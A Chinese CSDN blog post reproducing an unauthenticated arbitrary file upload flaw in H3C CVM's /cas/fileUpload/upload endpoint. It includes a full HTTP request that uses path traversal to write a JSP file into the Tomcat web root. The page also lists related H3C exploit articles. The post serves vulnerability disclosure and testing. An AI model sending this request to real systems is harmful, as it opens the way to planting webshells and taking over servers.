H3C CVM 前台任意文件上传漏洞(含批量验证poc)

已于 2024-04-05 14:50:02 修改
阅读量522 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-05 14:49:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137400650
版权
本文介绍了H3C CVM的/cas/fileUpload/upload接口存在的安全漏洞,允许未授权攻击者进行任意文件上传,可能导致webshell获取及服务器权限控制。详细讨论了漏洞描述、复现过程,并提供了POC验证方法和修复建议。
摘要由CSDN通过智能技术生成

0x01漏洞描述

H3C CVM /cas/fileUpload/upload接口存在任意文件上传漏洞,未授权的攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等

0x02漏洞复现

POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/c.jsp&name=123 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Accept: /
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Range: bytes 0-10/20
Connection: close

fiigfgm

0x03POC使

了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
专栏目录
订阅专栏
H3C CVM 前台任意文件上传漏洞复现
0xSec
11-29 1330
H3C CVM/cas/fileUpload/upload接口存在任意文件上传漏洞,未授权的攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。
H3C-校园网自助服务系统flexfileupload任意文件上传
weixin_43567873的博客
03-08 297
H3C-校园网自助服务系统flexfileupload任意文件上传
漏洞复现】深信服 行为感知系统 日志中心 c.php 远程命令执行
最新发布
凝聚力安全团队
07-17 323
深信服 行为感知系统 日志中心 c.php存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限
漏洞复现】H3C CVM 云计算管理平台 upload 前台任意文件上传漏洞
凝聚力安全团队
07-15 1224
华三 H3C CVM upload 接口处存在任意文件上传漏洞,未经过身份认证的远程攻击者可利用此漏洞上传任意文件,最终可导致服务器失陷。H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制, 以简洁的管理界面, 统一管理数据中心内所有的物理资源和虚拟资源, 不仅能提高管理员的管控能力、 简化日常例行工作, 更可降低 IT 环境的复杂度和管理成本。
H3C云计算《CVM标准版功能原理》培训.rar
07-31
计算责源概念及部署mp4 虚拟交换机原理及部署mp4 CAS存储資源挂载原理及部署1mp4 CAS存储资源挂载原理及部署2.mp4 高可靠性原理及部署mp
漏洞复现-H3C系列
aming小老弟
03-15 1011
H3C用户自助服务平台是一种基于云计算和自动化技术的管理平台,旨在提供自助式、智能化的网络设备和服务管理解决方案。该平台通过集成多种功能和工具,帮助企业用户更高效地管理和维护其网络设备,并提供更好的用户体验。H3C用户自助服务平台dynamiccontent.properties.xhtml接口处存在命令执行漏洞,未经身份验证的攻击者可以利用此漏洞执行任意指令,写入后门文件,导致整个web服务器存在被控的风险。
H3C-校园网自助服务系统-flexfileupload-任意文件上传-0day未公开漏洞
qq_39894062的博客
04-08 652
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
H3C CVM 前台任意文件上传漏洞.md
07-09
H3C CVM 前台任意文件上传漏洞
H3C_CAS云计算管理平台配置指导书
08-03
H3C_CAS云计算管理平台配置指导书 H3C云配置介绍
网络安全进阶学习第五课——文件上传漏洞
p36273的博客
07-03 4957
黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。getimagesize()函数会读取目标文件的16进制,验证目标文件16进制的头几个字符串是否符合图片的要求,通过此函数判断文件类型。通常在一个请求中,同样名称的参数只会出现一次,函数包的文件都会被当作PHP代码执行,无论文件的名称是什么,只要符合文件内容符合PHP代码规范,都会被当作PHP代码执行。
H3C任意命令执行漏洞
战神/calmness的博客
05-23 9637
H3C漏洞 目录 简述 过程 修复建议 参考链接 简述 H3C iMC智能管理中心 云计算(cloud computing):“云计算是一种计算模式,利用互联网技术把大量可扩展和弹性的IT相关能力作为一种服务提供给多个用户(Gartner)”。提供资源的网络被称为“云”。“云”中的资源在使用者看来是可以无限扩展的,并且可以随时获取,按需使用,随时扩展,这使得应用提供者无需为繁琐的细节而烦恼,能够更加专注于自己的业务,有利于创新和降低成本。 过程 body="iMC来宾接入自助管理..
文件上传 FileUpload
Renqizhi专栏
04-17 530
    private void SaveImages()    {        ///检查文件扩展名字        errorAlertDiv.Visible = false;        if (UserImageUpload.HasFile)        {            string fileExt = System.IO.Path.GetExtension(UserIm
web常见漏洞
阿布哥的读书笔记
04-20 1240
11年江湖11年情 很久没有来这里写写东西、发发牢骚了,
fileupload(文件上传)-两种方式
live的专栏
12-17 656
刚刚给前端同事写了一个文件中心功能,用于saas平台的头像上传测试,直接使用原生的Servlet实现,做个文件上传的整理 1.fileupload(文件上传) 方式一: 基于 原生requset本身的getParts()实现文件上传 Collection<Part> coll = req.getParts(); ServletInputStream sin = req.getInp...
H3C SecParh堡垒机任意用户登录与远程执行代码漏洞
剁椒鱼头没剁椒的博客
02-02 3471
这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。
h3c虚拟化服务器配置,H3C CAS 虚拟化平台安装部署
weixin_39759155的博客
07-31 6511
H3C CAS 虚拟化平台安装部署H3C CAS采用基于KVM技术的虚拟化解决方案,基于OpenStack架构的虚拟化管理解决方案。CAS软件包扩了CVK,CVM,CIC,SSV。CAS使用的是B/S结构,CAS安装可以将计算节点与控制节点甚至面向用户服务端集中安装也可分开安装。个人认为华三的这套虚拟化系统,更加相似于VMwareVsphere的EXSi,相比之下更完善了面向用户的自主服务,将申请...
H3C CVM 前台任意文件上传漏洞详解
"H3C CVM 前台任意文件上传漏洞" H3C CVM 前台任意文件上传漏洞是一种严重的安全漏洞,可能会导致攻击者上传恶意文件,进而控制服务器或盗取敏感数据。本文将详细介绍该漏洞的原理、影响范围、检测方法和修复方案。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值